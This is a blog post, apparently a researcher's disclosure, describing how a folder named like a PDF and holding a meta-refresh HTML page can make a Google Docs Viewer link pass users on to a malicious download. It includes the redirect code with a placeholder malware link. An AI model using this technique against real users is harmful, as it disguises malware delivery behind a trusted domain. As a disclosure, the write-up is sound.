Spreading malicious softwares via google document viewer

 

Google document or Google Docs is an awesome word processor offered by Google within its Google Drive service. The suite allows users to create and edit documents online while collaborating with other users in real-time. The best thing is that it serves as a collaborative tool for editing documents in real time. Documents can be shared, opened, and edited by multiple users simultaneously and users are able to see character-by-character changes as other collaborators make edits.

Earlier Google had a page that allowed users to quickly view documents online right from your browser. The Google Docs Viewer page was available at docs.google.com/viewer and drive.google.com/viewer. one could enter a document URL and Google generated a link to view it. This worked for a lot of file types: Microsoft Office files, PDFs, PostScript files and more.

 

 This feature is no longer available. The URL shows a 404 error. While the page is no longer available one can still use the Google Docs Viewer by pasting URL here

https://docs.google.com/viewer?url=[URL to pdf file]

For example
https://docs.google.com/viewer?url=https://bitcoin.org/bitcoin.pdf

The Flaw

I wondered what would happen if i give the URL of a website ( say a malicious one ). for testing i gave the url of my site. and to my surprise it showed a 500 error.
https://docs.google.com/viewer?url=https://www.hackatrick.com
Next i entered a link of a .gif image to see if it get opened or not. But i got a No preview error.
I also tried to enter a link of a website with an open redirect flaw. I wanted to see if it redirect to the site. but it ended up showing the html source code of the redirect page.
I realized that we cannot use open redirect here because if we use open redirect and try to redirect user then it shows the html source code of the redirect page. the link shows the html source code if the url ends with an .html extension and shows pdf files if the url ends with a .pdf extension and shows 500 error if we enter a domain name.
My goal was to redirect user to a site using google document . So I started thinking of an alternative way.
I created a directory in my website and named it as demo1.pdf . Inside the directory i created a html file and named it as index.html and added the folloing codes in it

 

 <html>
<head>
<title>A web page that points a browser to a different page after 2 seconds</title>
<meta http-equiv=”refresh” content=”0; URL=[link to malicious software]”>
<meta name=”keywords” content=”automatic redirection”>
</head>
<body>
test
manually.
</body>
</html>

This code redirects the index.html to a different site after a specific amount of time.

Now when I entered this url in the google document viewer site, google thought it to be a normal pdf file and not html so it did nt show the html source code. and since there was no pdf so it showed a ‘no preview’ message.

Now if an user gets this link, he will first see the url where it is clearly written as .pdf . next he will wonder if its a pdf file then why its not getting opened in the viewer ? and the third thing he will notice is the 3rd party apps suggested by google to open the pdf. the user willl have no clue that its not actually a pdf file. So if the user clicks on the view original button which is on the top of the viewer page, the user will land in the /demo1.pdf directory which have the html file which redirects to malicious software link.

In firefox it will show a popup with a save option and in chrome it will automatically start downloading.

In firebox browser it shows a popup with a save file option

 
In firefox

In chrome it automatically starts downloading

In chrome

I have reported the flaw to google security team but unfortunately this flaw does not come under their bug bounty program as they don’t consider it to be a valid vulnerability, but it does not matter as the fun and the learning is more important. Google thanked me for informing them about the issue and they will fix it soon. Hopefully !!